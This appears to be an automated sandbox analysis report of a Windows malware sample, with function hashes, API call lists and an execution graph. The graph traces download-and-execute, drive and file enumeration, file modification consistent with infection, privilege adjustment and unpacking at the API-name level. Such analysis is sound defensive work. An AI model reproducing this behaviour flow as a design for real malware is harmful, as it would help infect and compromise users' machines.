                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                              • String ID:
                              • API String ID: 2579439406-0
                              • Opcode ID: 23da0d9ffc51f7e3674ec70a0344f5b5beb142691558593c3537b45a2856aa59
                              • Instruction ID: a2c1d01f0a8fc7b860fa4c5ba8dee9755c81e3f17099ada6bc54c17834eb60e6
                              • Opcode Fuzzy Hash: 23da0d9ffc51f7e3674ec70a0344f5b5beb142691558593c3537b45a2856aa59
                              • Instruction Fuzzy Hash: 3E21FEB4401210EFD740DF65FA856893BB4FB48300F1184BAEA08E76B0E3F859A48F1D
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(Function_00005FBE), ref: 00406005
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 03e2138c96defe5f6c4322f41c97ea28f6cc5d0ca766cf02e782f863edac97cf
                              • Instruction ID: 276ab158461ab0854dff8c4ba172e82da5abdd5be2fa13cd776f410961e88b47
                              • Opcode Fuzzy Hash: 03e2138c96defe5f6c4322f41c97ea28f6cc5d0ca766cf02e782f863edac97cf
                              • Instruction Fuzzy Hash: 7890026125252196D60027715E0968776D49A5960676109716212E4094DABC8054991A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                              • Instruction ID: 7b357e6e517895dbe12adbe9a7f777a7b357507db5a8af5602780b1ce824b875
                              • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                              • Instruction Fuzzy Hash: 79819531608B458FC714DF29D8906EAB7E2EFD6314F14892ED0EA87751D738A889CB49

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 732 4010a0-4010ca 733 4010cc 732->733 734 4010df-401107 call 401e96 732->734 735 4010d0-4010d3 733->735 740 4011b1-4011cb call 401a9b call 401b60 734->740 741 40110d-401112 734->741 737 4010d5 735->737 738 4010d9-4010dd 735->738 737->738 738->734 738->735 750 4011ce-4011e6 call 401ee2 740->750 741->740 742 401118-40113f call 401e96 741->742 748 401142-401147 742->748 748->748 751 401149-401154 748->751 752 401160-401166 751->752 753 401156-40115a 751->753 755 401171-4011af call 401c84 call 401a9b call 401b60 752->755 758 401168-40116f 752->758 753->755 756 40115c 753->756 755->750 756->752 758->752 758->755
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID: __wsplitpath_calloc_strncpy$__wmakepath
                              • String ID: \$\
                              • API String ID: 550690-164819647
                              • Opcode ID: 6b08398ac8986faab224cc4e25f628c45a334c78e1b91678b68513e9d93174b4
                              • Instruction ID: ff4e68a8fe18fc9b97d4bba43c3c323c9ca1ce8c53413bd27601e723a30b8d8d
                              • Opcode Fuzzy Hash: 6b08398ac8986faab224cc4e25f628c45a334c78e1b91678b68513e9d93174b4
                              • Instruction Fuzzy Hash: 9F316CB1404380AED325DB10CC81FEBB3E8AF89704F04496EF7C567191E378994887AB
                              APIs
                              • _memset.LIBCMT ref: 00401375
                              • SetConsoleCtrlHandler.KERNEL32 ref: 0040138C
                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,?,00000001), ref: 004013AF
                              • _fprintf.LIBCMT ref: 004013C7
                              • WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 004013E6
                              • GetExitCodeProcess.KERNEL32(00000001,00000000), ref: 004013F5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID: Process$CodeConsoleCreateCtrlExitHandlerObjectSingleWait_fprintf_memset
                              • String ID: D$failed to create process.$failed to get exit code from process.
                              • API String ID: 1493708761-2047806753
                              • Opcode ID: d0de34054ce82bd43d2fe410723fc00cfad17156a394d383c3c61f2657a6dedf
                              • Instruction ID: 34a530c21fcf4aab6bb134418fb42986268233c3b95e978881f8daa222adcb36
                              • Opcode Fuzzy Hash: d0de34054ce82bd43d2fe410723fc00cfad17156a394d383c3c61f2657a6dedf
                              • Instruction Fuzzy Hash: D31191B0648301AFE310EF65CD46F1B77E8AB84B04F108D2DF659E62D0E6B8D5188B5A
                              APIs
                              • __getptd.LIBCMT ref: 004046D1
                                • Part of subcall function 0040516E: __getptd_noexit.LIBCMT ref: 00405171
                                • Part of subcall function 0040516E: __amsg_exit.LIBCMT ref: 0040517E
                              • __amsg_exit.LIBCMT ref: 004046F1
                              • __lock.LIBCMT ref: 00404701
                              • InterlockedDecrement.KERNEL32(?), ref: 0040471E
                              • InterlockedIncrement.KERNEL32(009A1660), ref: 00404749
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                              • String ID:
                              • API String ID: 4271482742-0
                              • Opcode ID: bfb2d015a437bf2f75142ed56999e104d6438876da5dba3a6470cb0087768ea4
                              • Instruction ID: 762af939121588747dd0ca135b41566db6ae5fc7b386992e2f1cba590a1bc26f
                              • Opcode Fuzzy Hash: bfb2d015a437bf2f75142ed56999e104d6438876da5dba3a6470cb0087768ea4
                              • Instruction Fuzzy Hash: EE01EDB1901621ABC720AF2698067AE7664BB41755F04813BEA60772D0CB3C6D01CFDD
                              APIs
                              • __lock.LIBCMT ref: 00403ADB
                                • Part of subcall function 00403EF9: __mtinitlocknum.LIBCMT ref: 00403F0F
                                • Part of subcall function 00403EF9: __amsg_exit.LIBCMT ref: 00403F1B
                                • Part of subcall function 00403EF9: EnterCriticalSection.KERNEL32(?,?,?,004019E7,?), ref: 00403F23
                              • ___sbh_find_block.LIBCMT ref: 00403AE6
                              • ___sbh_free_block.LIBCMT ref: 00403AF5
                              • HeapFree.KERNEL32(00000000,?,0040F578,0000000C,0040515F,00000000,?,0040399D,?,00000001,?,?,00403E83,00000018,0040F5E0,0000000C), ref: 00403B25
                              • GetLastError.KERNEL32(?,0040399D,?,00000001,?,?,00403E83,00000018,0040F5E0,0000000C,00403F14,?,?,?,004019E7,?), ref: 00403B36
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                              • String ID:
                              • API String ID: 2714421763-0
                              • Opcode ID: a12cb5a377b960506db2246119b09161ccaed8dd57b3f76921e50dc72fc51c3a
                              • Instruction ID: 0fc8657c13906ab74fcdd902c6ebe0ed0f7107b6a60225d746b313d4028bb8d5
                              • Opcode Fuzzy Hash: a12cb5a377b960506db2246119b09161ccaed8dd57b3f76921e50dc72fc51c3a
                              • Instruction Fuzzy Hash: 64015EB1941305AADA306FA2980AB5B7E689B0072AF10853FF104B61C2CA7C9A408A5C
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID: _sprintf$_calloc
                              • String ID: %s
                              • API String ID: 1847391153-3874713491
                              • Opcode ID: 506ba3259ec5662ead1a3bac2a13b86467e90f765512d11c77d13c91b1884411
                              • Instruction ID: 3e0aaedb16861467738b36e15ffebac14c8137eedcf37fbcf32618918a6528ec
                              • Opcode Fuzzy Hash: 506ba3259ec5662ead1a3bac2a13b86467e90f765512d11c77d13c91b1884411
                              • Instruction Fuzzy Hash: B72138312042025FC311CF1CC494EE6B3E69F86348F15456AF885EB2B2DA76E90E87D5
                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040A318
                              • __isleadbyte_l.LIBCMT ref: 0040A34C
                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A37D
                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A3EB
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              • String ID:
                              • API String ID: 3058430110-0
                              • Opcode ID: 4f57c0c18d61a66ad97d6be7dec4c5e608a13d2facb429ccd72208ac479570c4
                              • Instruction ID: ecb9902cf17e40a010e2e2b1b54a430317f3bb45ddcf6aa4964fa5cd43223a8d
                              • Opcode Fuzzy Hash: 4f57c0c18d61a66ad97d6be7dec4c5e608a13d2facb429ccd72208ac479570c4
                              • Instruction Fuzzy Hash: C531D031A00346EFDB20DF64C8949AE3BA5FF01310B1589BAE861AB2D1D734DD60DB5A
                              APIs
                              • __getptd.LIBCMT ref: 00404E3D
                                • Part of subcall function 0040516E: __getptd_noexit.LIBCMT ref: 00405171
                                • Part of subcall function 0040516E: __amsg_exit.LIBCMT ref: 0040517E
                              • __getptd.LIBCMT ref: 00404E54
                              • __amsg_exit.LIBCMT ref: 00404E62
                              • __lock.LIBCMT ref: 00404E72
                              Memory Dump Source
                              • Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd
                              Similarity
                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                              • String ID:
                              • API String ID: 3521780317-0
                              • Opcode ID: 3dcc82b5a170c8cf9336be6d49bee876bb3b912368579d21efbebef048838667
                              • Instruction ID: 09d2f9d651c6c409bc02885c121a8a6903a39f7021fc6d6957eb733fdf563978
                              • Opcode Fuzzy Hash: 3dcc82b5a170c8cf9336be6d49bee876bb3b912368579d21efbebef048838667
                              • Instruction Fuzzy Hash: ADF062B69407008AD630BB75D80674F76907F40725F15823FF6407B2D2CB7C5901CA99

                              Execution Graph

                              Execution Coverage:32.2%
                              Dynamic/Decrypted Code Coverage:10.4%
                              Signature Coverage:18.9%
                              Total number of Nodes:297
                              Total number of Limit Nodes:12
                              execution_graph 1340 256014 1341 256035 GetModuleHandleA 1340->1341 1342 25605f 1340->1342 1343 25604d GetProcAddress 1341->1343 1344 256058 1343->1344 1344->1342 1344->1343 1344->1344 1011 256076 1012 25607b 1011->1012 1016 2560c7 1011->1016 1014 2560b0 VirtualAlloc 1012->1014 1012->1016 1023 2561b2 1012->1023 1013 25615f VirtualFree 1013->1016 1014->1016 1015 256198 VirtualFree 1015->1023 1016->1013 1016->1015 1017 2560d5 VirtualAlloc 1016->1017 1017->1016 1018 256389 VirtualProtect 1021 2563b7 1018->1021 1019 2563fc VirtualProtect 1020 256400 1019->1020 1021->1019 1022 2563e7 VirtualProtect 1021->1022 1022->1019 1022->1021 1023->1018 1024 2562fb 1023->1024 1025 2514e1 1026 251541 1025->1026 1027 2514fd GetModuleHandleA 1025->1027 1030 251573 1026->1030 1031 251549 1026->1031 1028 251512 1027->1028 1029 25151a VirtualQuery 1027->1029 1028->1026 1029->1028 1036 251638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1030->1036 1035 251566 1031->1035 1053 251af9 1031->1053 1033 251579 ExitProcess 1037 25167f 1036->1037 1038 25167a 1036->1038 1059 251718 GetSystemTimeAsFileTime 1037->1059 1071 25139f GetVersionExA 1038->1071 1041 251686 1042 2516ca 1041->1042 1047 2516a0 CreateThread 1041->1047 1043 2516d7 1042->1043 1044 2516d0 1042->1044 1045 2516dd lstrcpy 1043->1045 1046 25170f 1043->1046 1092 251581 1044->1092 1045->1033 1046->1033 1064 252c48 memset 1047->1064 1308 251099 1047->1308 1052 251718 3 API calls 1052->1042 1054 251b11 1053->1054 1055 251b09 1053->1055 1056 251b16 CreateThread 1054->1056 1058 251b0f 1054->1058 1057 251638 188 API calls 1055->1057 1056->1058 1327 251638 189 API calls 1056->1327 1057->1058 1058->1035 1058->1058 1060 251735 SHSetValueA 1059->1060 1061 251754 1059->1061 1063 251786 __aulldiv 1060->1063 1062 25175a SHGetValueA 1061->1062 1061->1063 1062->1063 1063->1041 1098 251973 PathFileExistsA 1064->1098 1066 252cb2 1069 2516ba WaitForSingleObject 1066->1069 1070 252cbb VirtualFree 1066->1070 1068 252c8f CreateThread WaitForMultipleObjects 1068->1066 1120 252b8c memset GetLogicalDriveStringsA 1068->1120 1069->1052 1070->1069 1072 2513cf LookupPrivilegeValueA 1071->1072 1073 2514da 1071->1073 1074 2513e7 1072->1074 1076 2513ef 1072->1076 1073->1037 1288 25119f GetCurrentProcess OpenProcessToken 1074->1288 1076->1073 1293 25120e GetModuleHandleA GetProcAddress 1076->1293 1081 251448 GetCurrentProcessId 1081->1073 1082 251457 1081->1082 1082->1073 1083 251319 3 API calls 1082->1083 1084 25147f 1083->1084 1085 251319 3 API calls 1084->1085 1086 25148e 1085->1086 1086->1073 1087 251319 3 API calls 1086->1087 1088 2514b4 1087->1088 1089 251319 3 API calls 1088->1089 1090 2514c3 1089->1090 1091 251319 3 API calls 1090->1091 1091->1073 1307 25185b GetSystemTimeAsFileTime srand rand srand rand 1092->1307 1094 251592 wsprintfA wsprintfA lstrlen CreateFileA 1095 251633 1094->1095 1096 2515fb WriteFile CloseHandle 1094->1096 1095->1046 1096->1095 1097 25161d ShellExecuteA 1096->1097 1097->1095 1099 251ac7 1098->1099 1100 2519a0 1098->1100 1099->1066 1099->1068 1101 2519af CreateFileA 1100->1101 1102 2519c4 Sleep 1101->1102 1103 251a28 GetFileSize 1101->1103 1102->1101 1104 2519d5 1102->1104 1105 251a80 1103->1105 1106 251a38 1103->1106 1119 25185b GetSystemTimeAsFileTime srand rand srand rand 1104->1119 1108 251a96 1105->1108 1109 251a8d CloseHandle 1105->1109 1106->1105 1107 251a3d VirtualAlloc 1106->1107 1107->1105 1111 251a53 1107->1111 1112 251aad 1108->1112 1118 251a9c DeleteFileA 1108->1118 1109->1108 1111->1105 1114 251a59 ReadFile 1111->1114 1112->1099 1117 251ab8 VirtualFree 1112->1117 1113 2519da wsprintfA CopyFileA 1113->1103 1116 251a0d CreateFileA 1113->1116 1114->1105 1114->1111 1116->1103 1116->1118 1117->1099 1118->1112 1119->1113 1121 252c09 WaitForMultipleObjects 1120->1121 1126 252bc8 1120->1126 1123 252c3c 1121->1123 1124 252c2a CreateThread 1121->1124 1122 252bfa lstrlen 1122->1121 1122->1126 1124->1123 1131 252845 1124->1131 1125 252bd2 GetDriveTypeA 1125->1122 1125->1126 1126->1122 1126->1125 1127 252be3 CreateThread 1126->1127 1127->1122 1128 252b7d 1127->1128 1141 2529e2 memset wsprintfA 1128->1141 1278 25274a memset memset SHGetSpecialFolderPathA wsprintfA 1131->1278 1133 252878 DeleteFileA 1134 25288c VirtualFree 1133->1134 1135 25289a 1133->1135 1134->1135 1137 2528a4 CloseHandle 1135->1137 1138 2528ab 1135->1138 1136 252692 8 API calls 1139 252853 1136->1139 1137->1138 1139->1133 1139->1136 1140 25239d 186 API calls 1139->1140 1140->1139 1142 252abc memset memset FindFirstFileA 1141->1142 1143 252a3a memset lstrlen lstrcpyn strrchr 1141->1143 1155 2528b8 memset wsprintfA 1142->1155 1143->1142 1145 252a88 1143->1145 1145->1142 1146 252a9a lstrcmpiA 1145->1146 1148 252b74 1146->1148 1149 252aad lstrlen 1146->1149 1149->1142 1149->1146 1150 252b61 FindNextFileA 1151 252b23 1150->1151 1152 252b6d FindClose 1150->1152 1153 252b35 lstrcmpiA 1151->1153 1154 2528b8 174 API calls 1151->1154 1152->1148 1153->1151 1153->1152 1154->1150 1156 252905 1155->1156 1157 252951 memset 1155->1157 1156->1157 1158 252956 strrchr 1156->1158 1159 25291b memset wsprintfA 1156->1159 1157->1150 1158->1157 1160 252967 lstrcmpiA 1158->1160 1161 2529e2 180 API calls 1159->1161 1162 252988 lstrcmpiA 1160->1162 1163 25297a 1160->1163 1161->1157 1162->1157 1166 252994 1162->1166 1173 251e6e 1163->1173 1165 2529ad strstr 1168 2529d3 1165->1168 1169 2529cb 1165->1169 1166->1165 1167 2529a5 lstrcpy 1166->1167 1167->1165 1238 252692 1168->1238 1216 25239d strstr 1169->1216 1174 251e7d 1173->1174 1247 251df6 strrchr 1174->1247 1177 251eb0 SetFileAttributesA CreateFileA 1178 252332 1177->1178 1179 251edf 1177->1179 1181 252346 1178->1181 1182 25233d UnmapViewOfFile 1178->1182 1252 251915 1179->1252 1184 252350 1181->1184 1185 25234b CloseHandle 1181->1185 1182->1181 1186 252356 CloseHandle 1184->1186 1187 252391 1184->1187 1185->1184 1186->1187 1187->1157 1188 251f2e 1188->1178 1258 251c81 1188->1258 1192 251f92 1193 251c81 2 API calls 1192->1193 1194 251f9f 1193->1194 1194->1178 1195 251af9 169 API calls 1194->1195 1196 252024 1194->1196 1200 251fc0 1195->1200 1196->1178 1197 251af9 169 API calls 1196->1197 1198 25207a 1197->1198 1199 251af9 169 API calls 1198->1199 1204 252090 1199->1204 1200->1178 1200->1196 1201 251af9 169 API calls 1200->1201 1202 251ffe 1201->1202 1203 252013 FlushViewOfFile 1202->1203 1203->1196 1205 2520bb memset memset 1204->1205 1206 2520f5 1205->1206 1207 251c81 2 API calls 1206->1207 1209 2521de 1207->1209 1208 252226 memcpy UnmapViewOfFile CloseHandle 1263 251b8a 1208->1263 1209->1208 1211 25226e 1271 25185b GetSystemTimeAsFileTime srand rand srand rand 1211->1271 1213 2522ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1214 251915 3 API calls 1213->1214 1215 25231f CloseHandle 1214->1215 1215->1178 1217 252451 CreateFileA GetFileSize 1216->1217 1223 2523d8 1216->1223 1218 252675 CloseHandle 1217->1218 1219 252480 1217->1219 1220 25267c RemoveDirectoryA 1218->1220 1219->1218 1221 252499 1219->1221 1222 252687 1220->1222 1224 251915 3 API calls 1221->1224 1222->1157 1223->1217 1223->1222 1225 2524a4 9 API calls 1224->1225 1273 25189d memset CreateProcessA 1225->1273 1228 25255c Sleep memset wsprintfA 1229 2529e2 163 API calls 1228->1229 1230 252597 memset wsprintfA Sleep 1229->1230 1231 25189d 6 API calls 1230->1231 1232 2525e4 Sleep CreateFileA 1231->1232 1233 251915 3 API calls 1232->1233 1234 252610 CloseHandle 1233->1234 1234->1220 1235 25261e 1234->1235 1235->1220 1236 252641 SetFilePointer WriteFile 1235->1236 1236->1220 1237 252667 SetEndOfFile 1236->1237 1237->1220 1239 2526b2 WaitForSingleObject 1238->1239 1240 2526a2 CreateEventA 1238->1240 1241 2526c1 lstrlen ??2@YAPAXI 1239->1241 1242 252708 1239->1242 1240->1239 1243 252736 SetEvent 1241->1243 1244 2526da lstrcpy 1241->1244 1242->1243 1245 252718 lstrcpy ??3@YAXPAX 1242->1245 1243->1157 1246 2526f1 1244->1246 1245->1246 1246->1243 1248 251e13 lstrcpy strrchr 1247->1248 1249 251e62 1247->1249 1248->1249 1250 251e40 lstrcmpiA 1248->1250 1249->1177 1249->1178 1250->1249 1251 251e52 lstrlen 1250->1251 1251->1249 1251->1250 1253 251924 SetFilePointer CreateFileMappingA MapViewOfFile 1252->1253 1254 251928 1252->1254 1253->1178 1253->1188 1255 25194f 1254->1255 1256 25192e memset GetFileTime 1254->1256 1255->1253 1257 251954 SetFileTime 1255->1257 1256->1253 1257->1253 1259 251c9c 1258->1259 1261 251c94 1258->1261 1260 251cae memset memset 1259->1260 1259->1261 1260->1261 1261->1178 1262 25185b GetSystemTimeAsFileTime srand rand srand rand 1261->1262 1262->1192 1264 251b93 1263->1264 1272 25185b GetSystemTimeAsFileTime srand rand srand rand 1264->1272 1266 251bca srand 1267 251bd8 rand 1266->1267 1268 251c08 1267->1268 1268->1267 1269 251c29 memset memcpy lstrcat 1268->1269 1269->1211 1271->1213 1272->1266 1274 2518e0 CloseHandle WaitForSingleObject 1273->1274 1275 25190c 1273->1275 1276 251907 CloseHandle 1274->1276 1277 2518fb GetExitCodeProcess 1274->1277 1275->1220 1275->1228 1276->1275 1277->1276 1287 25185b GetSystemTimeAsFileTime srand rand srand rand 1278->1287 1280 2527b5 wsprintfA CopyFileA 1281 252840 1280->1281 1282 2527de wsprintfA 1280->1282 1281->1139 1283 251973 17 API calls 1282->1283 1284 25280f 1283->1284 1285 252820 CreateFileA 1284->1285 1286 252813 DeleteFileA 1284->1286 1285->1281 1286->1285 1287->1280 1289 2511c6 AdjustTokenPrivileges 1288->1289 1290 251200 CloseHandle 1288->1290 1291 2511f7 CloseHandle 1289->1291 1292 2511f6 1289->1292 1290->1076 1291->1290 1292->1291 1294 251310 1293->1294 1295 25123f GetCurrentProcessId OpenProcess 1293->1295 1294->1073 1302 251319 1294->1302 1295->1294 1299 251262 1295->1299 1296 2512b0 VirtualAlloc 1296->1299 1301 2512b8 1296->1301 1297 2512f1 CloseHandle 1297->1294 1298 251302 VirtualFree 1297->1298 1298->1294 1299->1296 1299->1297 1300 251296 VirtualFree 1299->1300 1299->1301 1300->1296 1301->1297 1303 25134a 1302->1303 1304 25132a GetModuleHandleA GetProcAddress 1302->1304 1305 251351 memset 1303->1305 1306 251363 1303->1306 1304->1303 1304->1306 1305->1306 1306->1073 1306->1081 1307->1094 1309 2510ba 1308->1309 1310 251196 1308->1310 1309->1310 1326 25185b GetSystemTimeAsFileTime srand rand srand rand 1309->1326 1312 251118 wsprintfA wsprintfA URLDownloadToFileA 1313 2510dc 1312->1313 1314 251168 lstrlen Sleep 1312->1314 1317 251000 CreateFileA 1313->1317 1314->1309 1318 251025 GetFileSize CreateFileMappingA MapViewOfFile 1317->1318 1319 251092 WinExec lstrlen 1317->1319 1320 251057 1318->1320 1321 25107b 1318->1321 1319->1309 1319->1310 1324 251074 UnmapViewOfFile 1320->1324 1325 251061 1320->1325 1322 251087 CloseHandle 1321->1322 1323 25108d CloseHandle 1321->1323 1322->1323 1323->1319 1324->1321 1325->1324 1326->1312 1345 252361 1346 252374 1345->1346 1347 25236b UnmapViewOfFile 1345->1347 1348 252382 1346->1348 1349 252379 CloseHandle 1346->1349 1347->1346 1350 252391 1348->1350 1351 252388 CloseHandle 1348->1351 1349->1348 1351->1350 1328 256159 VirtualFree 1336 2560c7 1328->1336 1329 256198 VirtualFree 1338 2561b2 1329->1338 1330 2560d5 VirtualAlloc 1330->1336 1331 256389 VirtualProtect 1335 2563b7 1331->1335 1332 2563fc VirtualProtect 1334 256400 1332->1334 1333 25615f VirtualFree 1333->1336 1335->1332 1337 2563e7 VirtualProtect 1335->1337 1336->1329 1336->1330 1336->1333 1337->1332 1337->1335 1338->1331 1339 2562fb 1338->1339

                              Callgraph

                              • Executed
                              • Not Executed
                              • Opacity -> Relevance
                              • Disassembly available
